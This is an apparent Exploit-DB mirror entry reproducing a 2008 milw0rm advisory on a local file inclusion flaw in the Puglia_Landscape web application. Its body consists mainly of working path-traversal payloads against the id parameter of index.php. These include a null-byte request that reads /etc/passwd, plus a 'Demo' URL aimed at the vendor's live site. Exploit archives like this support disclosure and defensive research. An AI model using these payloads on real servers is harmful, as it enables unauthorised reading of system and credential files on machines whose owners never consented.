exploit-db-mirror/exploits/php/webapps/6979.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

22 lines
No EOL
639 B
Text

/*
---------------------------------------------------
Puglia_Landscape Local File Inclusion Vulnerability
---------------------------------------------------
Discovered By StAkeR[at]hotmail[dot]it
http://www.niclor.net/prodotti/Puglia_Landscape
---------------------------------------------------
* Local File Inclusion
* Note: Magic_Quotes_GPC Off
- index.php?id=../../../../../../../[Local File and NullByte]
- index.php?id=../../../../../../../etc/passwd%00
* Demo
- http://www.niclor.net/prodotti/Puglia_Landscape/index.php?id=../../../../../../../etc/passwd%00
*/
# milw0rm.com [2008-11-04]